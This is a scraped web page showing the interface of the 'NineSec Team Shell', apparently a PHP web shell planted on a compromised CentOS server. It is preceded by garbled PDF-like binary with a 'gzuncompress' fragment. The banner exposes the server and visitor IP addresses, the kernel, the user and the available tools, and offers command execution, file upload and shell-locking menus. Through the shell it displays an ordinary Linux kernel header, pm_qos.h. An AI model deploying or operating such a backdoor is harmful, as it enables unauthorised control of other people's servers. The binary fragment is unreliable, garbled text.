%PDF-1.3 %âãÏÓ 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream xœ¥\mo7þ ÿa?îâñH£ÑÌàŠyi{¹$EÚ(i?¬cÇÞÄkûürAþý‰½Žv·EÛízF¢HI|H‘Ô?¿{Ø|Z|X|÷Ýñó‡‡õÇËó³Å‡ã77Û?O¾Ýž¿__l®×››ëãßOàя77çwß¿xñêåâÅÉÓ'Ç?ªÅ°8ùôôI] µûgQ»ÔB©¦2zaà³]œlÝûÅ|üôôɇåÛ՟‹“?}òƒ£ " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress NineSec Team Shell
NineSec Team Shell
Server IP : 10.0.3.46  /  Your IP : 172.70.127.67
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34
System : Linux ukmjuara 3.10.0-1160.95.1.el7.x86_64 #1 SMP Mon Jul 24 13:59:37 UTC 2023 x86_64
User : apache ( 48)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON
Directory (0755) :  /usr/src/kernels/3.10.0-957.10.1.el7.x86_64/include/linux/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : //usr/src/kernels/3.10.0-957.10.1.el7.x86_64/include/linux/pm_qos.h
#ifndef _LINUX_PM_QOS_H
#define _LINUX_PM_QOS_H
/* interface for the pm_qos_power infrastructure of the linux kernel.
 *
 * Mark Gross <mgross@linux.intel.com>
 */
#include <linux/plist.h>
#include <linux/notifier.h>
#include <linux/miscdevice.h>
#include <linux/device.h>
#include <linux/workqueue.h>

enum {
	PM_QOS_RESERVED = 0,
	PM_QOS_CPU_DMA_LATENCY,
	PM_QOS_NETWORK_LATENCY,
	PM_QOS_NETWORK_THROUGHPUT,

	/* insert new class ID */
	PM_QOS_NUM_CLASSES,
};

enum pm_qos_flags_status {
	PM_QOS_FLAGS_UNDEFINED = -1,
	PM_QOS_FLAGS_NONE,
	PM_QOS_FLAGS_SOME,
	PM_QOS_FLAGS_ALL,
};

#define PM_QOS_DEFAULT_VALUE -1

#define PM_QOS_CPU_DMA_LAT_DEFAULT_VALUE	(2000 * USEC_PER_SEC)
#define PM_QOS_NETWORK_LAT_DEFAULT_VALUE	(2000 * USEC_PER_SEC)
#define PM_QOS_NETWORK_THROUGHPUT_DEFAULT_VALUE	0
#define PM_QOS_DEV_LAT_DEFAULT_VALUE		0
#define PM_QOS_LATENCY_TOLERANCE_DEFAULT_VALUE	0
#define PM_QOS_LATENCY_TOLERANCE_NO_CONSTRAINT	(-1)
#define PM_QOS_LATENCY_ANY			((s32)(~(__u32)0 >> 1))

#define PM_QOS_FLAG_NO_POWER_OFF	(1 << 0)
#define PM_QOS_FLAG_REMOTE_WAKEUP	(1 << 1)

struct pm_qos_request {
	struct plist_node node;
	int pm_qos_class;
	struct delayed_work work; /* for pm_qos_update_request_timeout */
};

struct pm_qos_flags_request {
	struct list_head node;
	s32 flags;	/* Do not change to 64 bit */
};

enum dev_pm_qos_req_type {
	DEV_PM_QOS_LATENCY = 1,
	DEV_PM_QOS_FLAGS,
#ifndef __GENKSYMS__
	DEV_PM_QOS_LATENCY_TOLERANCE,
#endif
};

struct dev_pm_qos_request {
	enum dev_pm_qos_req_type type;
	union {
		struct plist_node pnode;
		struct pm_qos_flags_request flr;
	} data;
	struct device *dev;
};

enum pm_qos_type {
	PM_QOS_UNITIALIZED,
	PM_QOS_MAX,		/* return the largest value */
	PM_QOS_MIN		/* return the smallest value */
};

/*
 * Note: The lockless read path depends on the CPU accessing target_value
 * or effective_flags atomically.  Atomic access is only guaranteed on all CPU
 * types linux supports for 32 bit quantites
 */
struct pm_qos_constraints {
	struct plist_head list;
	s32 target_value;	/* Do not change to 64 bit */
	s32 default_value;
	enum pm_qos_type type;
	struct blocking_notifier_head *notifiers;
};

struct pm_qos_flags {
	struct list_head list;
	s32 effective_flags;	/* Do not change to 64 bit */
};

struct dev_pm_qos {
	struct pm_qos_constraints latency;
	struct pm_qos_flags flags;
	struct dev_pm_qos_request *latency_req;
	struct dev_pm_qos_request *flags_req;
	RH_KABI_EXTEND(struct pm_qos_constraints latency_tolerance)
	RH_KABI_EXTEND(struct dev_pm_qos_request *latency_tolerance_req)
};

/* Action requested to pm_qos_update_target */
enum pm_qos_req_action {
	PM_QOS_ADD_REQ,		/* Add a new request */
	PM_QOS_UPDATE_REQ,	/* Update an existing request */
	PM_QOS_REMOVE_REQ	/* Remove an existing request */
};

static inline int dev_pm_qos_request_active(struct dev_pm_qos_request *req)
{
	return req->dev != NULL;
}

int pm_qos_update_target(struct pm_qos_constraints *c, struct plist_node *node,
			 enum pm_qos_req_action action, int value);
bool pm_qos_update_flags(struct pm_qos_flags *pqf,
			 struct pm_qos_flags_request *req,
			 enum pm_qos_req_action action, s32 val);
void pm_qos_add_request(struct pm_qos_request *req, int pm_qos_class,
			s32 value);
void pm_qos_update_request(struct pm_qos_request *req,
			   s32 new_value);
void pm_qos_update_request_timeout(struct pm_qos_request *req,
				   s32 new_value, unsigned long timeout_us);
void pm_qos_remove_request(struct pm_qos_request *req);

int pm_qos_request(int pm_qos_class);
int pm_qos_add_notifier(int pm_qos_class, struct notifier_block *notifier);
int pm_qos_remove_notifier(int pm_qos_class, struct notifier_block *notifier);
int pm_qos_request_active(struct pm_qos_request *req);
s32 pm_qos_read_value(struct pm_qos_constraints *c);

#ifdef CONFIG_PM
enum pm_qos_flags_status __dev_pm_qos_flags(struct device *dev, s32 mask);
enum pm_qos_flags_status dev_pm_qos_flags(struct device *dev, s32 mask);
s32 __dev_pm_qos_read_value(struct device *dev);
s32 dev_pm_qos_read_value(struct device *dev);
int dev_pm_qos_add_request(struct device *dev, struct dev_pm_qos_request *req,
			   enum dev_pm_qos_req_type type, s32 value);
int dev_pm_qos_update_request(struct dev_pm_qos_request *req, s32 new_value);
int dev_pm_qos_remove_request(struct dev_pm_qos_request *req);
int dev_pm_qos_add_notifier(struct device *dev,
			    struct notifier_block *notifier);
int dev_pm_qos_remove_notifier(struct device *dev,
			       struct notifier_block *notifier);
int dev_pm_qos_add_global_notifier(struct notifier_block *notifier);
int dev_pm_qos_remove_global_notifier(struct notifier_block *notifier);
void dev_pm_qos_constraints_init(struct device *dev);
void dev_pm_qos_constraints_destroy(struct device *dev);
int dev_pm_qos_add_ancestor_request(struct device *dev,
				    struct dev_pm_qos_request *req, s32 value);
#else
static inline enum pm_qos_flags_status __dev_pm_qos_flags(struct device *dev,
							  s32 mask)
			{ return PM_QOS_FLAGS_UNDEFINED; }
static inline enum pm_qos_flags_status dev_pm_qos_flags(struct device *dev,
							s32 mask)
			{ return PM_QOS_FLAGS_UNDEFINED; }
static inline s32 __dev_pm_qos_read_value(struct device *dev)
			{ return 0; }
static inline s32 dev_pm_qos_read_value(struct device *dev)
			{ return 0; }
static inline int dev_pm_qos_add_request(struct device *dev,
					 struct dev_pm_qos_request *req,
					 enum dev_pm_qos_req_type type,
					 s32 value)
			{ return 0; }
static inline int dev_pm_qos_update_request(struct dev_pm_qos_request *req,
					    s32 new_value)
			{ return 0; }
static inline int dev_pm_qos_remove_request(struct dev_pm_qos_request *req)
			{ return 0; }
static inline int dev_pm_qos_add_notifier(struct device *dev,
					  struct notifier_block *notifier)
			{ return 0; }
static inline int dev_pm_qos_remove_notifier(struct device *dev,
					     struct notifier_block *notifier)
			{ return 0; }
static inline int dev_pm_qos_add_global_notifier(
					struct notifier_block *notifier)
			{ return 0; }
static inline int dev_pm_qos_remove_global_notifier(
					struct notifier_block *notifier)
			{ return 0; }
static inline void dev_pm_qos_constraints_init(struct device *dev)
{
	dev->power.power_state = PMSG_ON;
}
static inline void dev_pm_qos_constraints_destroy(struct device *dev)
{
	dev->power.power_state = PMSG_INVALID;
}
static inline int dev_pm_qos_add_ancestor_request(struct device *dev,
				    struct dev_pm_qos_request *req, s32 value)
			{ return 0; }
#endif

#ifdef CONFIG_PM_RUNTIME
int dev_pm_qos_expose_latency_limit(struct device *dev, s32 value);
void dev_pm_qos_hide_latency_limit(struct device *dev);
int dev_pm_qos_expose_flags(struct device *dev, s32 value);
void dev_pm_qos_hide_flags(struct device *dev);
int dev_pm_qos_update_flags(struct device *dev, s32 mask, bool set);
s32 dev_pm_qos_get_user_latency_tolerance(struct device *dev);
int dev_pm_qos_update_user_latency_tolerance(struct device *dev, s32 val);
int dev_pm_qos_expose_latency_tolerance(struct device *dev);
void dev_pm_qos_hide_latency_tolerance(struct device *dev);

static inline s32 dev_pm_qos_requested_latency(struct device *dev)
{
	return dev->power.qos->latency_req->data.pnode.prio;
}

static inline s32 dev_pm_qos_requested_flags(struct device *dev)
{
	return dev->power.qos->flags_req->data.flr.flags;
}
#else
static inline int dev_pm_qos_expose_latency_limit(struct device *dev, s32 value)
			{ return 0; }
static inline void dev_pm_qos_hide_latency_limit(struct device *dev) {}
static inline int dev_pm_qos_expose_flags(struct device *dev, s32 value)
			{ return 0; }
static inline void dev_pm_qos_hide_flags(struct device *dev) {}
static inline int dev_pm_qos_update_flags(struct device *dev, s32 m, bool set)
			{ return 0; }
static inline s32 dev_pm_qos_get_user_latency_tolerance(struct device *dev)
			{ return PM_QOS_LATENCY_TOLERANCE_NO_CONSTRAINT; }
static inline int dev_pm_qos_update_user_latency_tolerance(struct device *dev, s32 val)
			{ return 0; }
static inline int dev_pm_qos_expose_latency_tolerance(struct device *dev)
			{ return 0; }
static inline void dev_pm_qos_hide_latency_tolerance(struct device *dev) {}

static inline s32 dev_pm_qos_requested_latency(struct device *dev) { return 0; }
static inline s32 dev_pm_qos_requested_flags(struct device *dev) { return 0; }
#endif

#endif

NineSec Team - 2022